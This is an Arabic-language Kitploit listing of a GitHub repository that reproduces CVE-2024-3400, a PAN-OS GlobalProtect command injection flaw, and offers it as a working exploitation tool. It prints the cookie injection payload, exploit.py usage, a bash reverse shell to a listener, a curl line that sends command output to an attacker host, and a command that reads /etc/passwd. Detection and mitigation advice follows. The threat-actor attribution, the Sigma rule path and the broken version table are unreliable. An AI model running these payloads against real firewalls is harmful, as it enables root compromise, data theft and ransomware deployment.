Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2024-3400-panos_rce_reproduction — استنساخ cve-2024-3400-panos_rce_reproduction | Kitploit
أدوات/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

استنساخ cve-2024-3400-panos_rce_reproduction

عرض المستودع
منذ 27 أياملم تتم المراجعة بعد

CVE-2024-3400: حقن أوامر في Palo Alto PAN-OS GlobalProtect وتنفيذ كود عن بُعد

CVSS 10.0 حرجة | CWE-78: حقن أوامر نظام التشغيل | استغلال واسع النطاق في البرية


نظرة عامة

ثغرة CVE-2024-3400 هي ثغرة حقن أوامر قبل المصادقة في واجهتي بوابة GlobalProtect والبوابة المتصلة (Gateway) في نظام Palo Alto Networks PAN-OS، وتسمح للمهاجم غير المصادق بتنفيذ أوامر عشوائية بصلاحيات الجذر (root) على جدار الحماية المتأثر.

  • اكتُشفت بواسطة: Volexity (أبريل 2024)
  • الجهة المهاجمة المنسوبة: UNC4554 / Midnight Blizzard (مدعومة من الدولة الروسية)
  • معرّف CVE: CVE-2024-3400
  • درجة CVSS: 10.0 (حرجة)
  • CWE: CWE-78 (التحييد غير الصحيح للعناصر الخاصة المستخدمة في أمر نظام تشغيل)
  • الأثر: اختراق كامل لأجهزة جدار حماية PAN-OS، وحركة جانبية، ونشر برمجيات الفدية
  • الحالة: استُغلت بنشاط كثغرة يوم-الصفر قبل الإفصاح العام

التفاصيل الفنية

السبب الجذري

تكمن الثغرة في معالجة مكوّن بوابة GlobalProtect والبوابة المتصلة (Gateway) لملفات تعريف الارتباط الخاصة بالجلسة. تفشل الدالة المسؤولة عن معالجة ملف تعريف الارتباط SESSID في تعقيم المدخلات المقدمة من المستخدم بشكل صحيح قبل تمريرها إلى أمر شل (shell).

وتحديدًا، يؤدي طلب HTTP غير مصادَق إلى نقطة نهاية بوابة GlobalProtect (/global-protect/login.esp) مع ملف تعريف ارتباط SESSID معدّ يحتوي على محارف شل مضمّنة (علامات backtick وتوسيع متغيرات) إلى حقن أوامر.

آلية الحقن

يعمل مسار الكود المعيب على النحو التالي:

  1. تستقبل بوابة GlobalProtect طلبًا إلى /global-protect/login.esp
  2. يتم استخراج قيمة ملف تعريف الارتباط SESSID دون تعقيم
  3. تُدرج هذه القيمة في سلسلة أمر شل
  4. يُنفَّذ الأمر عبر system() أو دالة تنفيذ أوامر نظام تشغيل مماثلة
  5. نظرًا لأن التطبيق يعمل بصلاحيات الجذر (root)، يُنفَّذ الأمر المحقون بصلاحيات نظام كاملة

بناء الحمولة

تستخدم حمولة الحقن أوامر محددة بعلامات backtick داخل ملف تعريف الارتباط SESSID:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

يتجاوز مسار اجتياز الدليل (/../../../) المجلد المقصود، ويتسبب الجزء COMMAND المحاط بعلامتي backtick في تنفيذ الشل لمدخلات المهاجم. ويمكن استخدام إعادة توجيه المخرجات أو آليات القشرة العكسية (reverse shell) لاستخراج نتائج الأوامر.


الإصدارات المتأثرة

إصدار PAN-OSالمتأثرالإصلاح في
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x

ملاحظة: إصدارات PAN-OS 9.x والإصدارات الأقدم غير متأثرة. كما أن Cloud NGFW وPrisma Access غير متأثرين.


الاستغلال

ناقل الهجوم

  • الشبكة: عن بُعد
  • المصادقة: غير مطلوبة
  • الصلاحية المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء
  • الأثر: اختراق كامل للسرية والنزاهة والتوافر

النشاط المرصود للجهة المهاجمة

رُصدت جهة UNC4554 / Midnight Blizzard (APT29) وهي تستغل CVE-2024-3400 كثغرة يوم-الصفر بدءًا من مارس 2024. ونشرت Volexity تحليلها في 12 أبريل 2024. وشملت أنماط الهجوم:

  1. الوصول الأولي: فحص جماعي لبوابات GlobalProtect المكشوفة
  2. تنفيذ الأوامر: نشر أبواب خلفية مخصصة بلغة Python عبر ناقل حقن ملفات تعريف الارتباط
  3. الاستمرارية: تثبيت الباب الخلفي UPSTYLE، وسرقة بيانات الاعتماد، واستخراج الإعدادات
  4. الحركة الجانبية: استخدام جدران الحماية المخترقة كنقاط ارتكاز داخل الشبكات الداخلية
  5. سرقة البيانات: سرقة ملفات الإعدادات، وبيانات اعتماد VPN، ورموز الجلسات
  6. برمجيات الفدية: حوادث متعددة لنشر برمجيات الفدية بعد الاختراق الأولي

توفر إثبات المفهوم (PoC)

تم إصدار عدة إثباتات مفهوم (PoCs) عامة. يوفر هذا المستودع أداة استغلال عملية للاختبار المصرح به.


خطوات إعادة الإنتاج

المتطلبات

  • Python 3.8+
  • مكتبة requests
  • الهدف: Palo Alto PAN-OS مع بوابة GlobalProtect معرّضة للخطر
  • للاستخدام المصرح به فقط

الإعداد

root@kitploit:~
pip install requests

الاستغلال الأساسي

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

مثال على القشرة العكسية

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

قراءة ملفات عشوائية

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

إثبات المفهوم (curl)

root@kitploit:~
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

سكربت إثبات المفهوم

راجع exploit.py في هذا المستودع للحصول على أداة استغلال Python متكاملة الميزات تدعم:

  • تنفيذ أوامر عشوائية
  • دعم وكيل اختياري (Burp Suite / mitmproxy)
  • التحكم في التحقق من SSL
  • معالجة المهلات وإعادة المحاولة
  • تحليل الاستجابة

الكشف

مؤشرات الاختراق (IOCs)

  • طلبات إلى /global-protect/login.esp مع ملفات تعريف ارتباط SESSID طويلة بشكل غير طبيعي أو مشبوهة
  • ملفات تعريف ارتباط تحتوي على تسلسلات اجتياز المسار (/../../) مقترنة بمحارف backtick
  • عمليات غير متوقعة تُطلقها مكوّنات GlobalProtect
  • اتصالات صادرة من جدار الحماية إلى عناوين IP غير معروفة على منافذ غير معتادة
  • ملفات مكتوبة في /opt/panlogs/tmp/device_telemetry/ بامتدادات .py

قاعدة Sigma (مبسطة)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

التخفيف

الإجراءات الفورية

  1. حدّث PAN-OS إلى الإصدارات المُصلحة المذكورة أعلاه
  2. إذا لم يكن التصحيح الفوري ممكنًا، طبّق أحد الحلول البديلة التالية:
    • تعطيل القياس عن بعد للجهاز: set deviceconfig system telemetry disable yes (يحجب مسار الكود المعيب دون الحاجة إلى إعادة تشغيل)
    • التحكم في الوصول إلى بوابة/البوابة المتصلة لـ GlobalProtect: قصر الوصول على عناوين IP المصدر الموثوقة
  3. افحص بحثًا عن الاختراق: تحقق من وجود ملفات غير مصرح بها في /opt/panlogs/tmp/device_telemetry/
  4. راجع السجلات: افحص سجلات دخول GlobalProtect بحثًا عن قيم ملفات تعريف ارتباط SESSID شاذة

الإصلاح الدائم

طبّق الرقعة الإصلاحية (hotfix) التي وفرتها Palo Alto Networks. يقوم الإصلاح بتعقيم مدخلات ملفات تعريف الارتباط بشكل صحيح قبل إنشاء أمر الشل.

تقييم الاختراق

إذا كنت تشتبه في وجود استغلال:

  1. اجمع صور الطب الشرعي لجدران الحماية المتأثرة
  2. راجع جميع تغييرات الإعدادات (طوابع الوقت لآخر تعديل)
  3. راجع العمليات الجارية ومهام cron
  4. تحقق من وجود مفاتيح SSH وحسابات مستخدمين غير مصرح بها
  5. غيّر جميع بيانات اعتماد VPN والأسرار المشتركة
  6. افحص حركة مرور الشبكة بحثًا عن أنماط اتصال C2

المراجع


إخلاء المسؤولية

هذا المستودع مقدم لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط. الاستغلال غير المصرح به لهذه الثغرة غير قانوني. المؤلفون غير مسؤولين عن سوء استخدام هذه المعلومات. تأكد دائمًا من حصولك على إذن كتابي صريح قبل اختبار أي نظام.


الترخيص

رخصة MIT — هذا المحتوى مقدم لأبحاث الأمن الدفاعي والاختبار المصرح به.

تنزيل الأداة
< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10
11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3
المصدرالرابط
نشرة Palo Alto الأمنيةhttps://security.paloaltonetworks.com/CVE-2024-3400
تحليل Volexityhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
إدخال NVDhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400
تفاصيل CWE-78https://cwe.mitre.org/data/definitions/78.html
كتالوج CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
تقنية ATT&CKhttps://attack.mitre.org/techniques/T1190/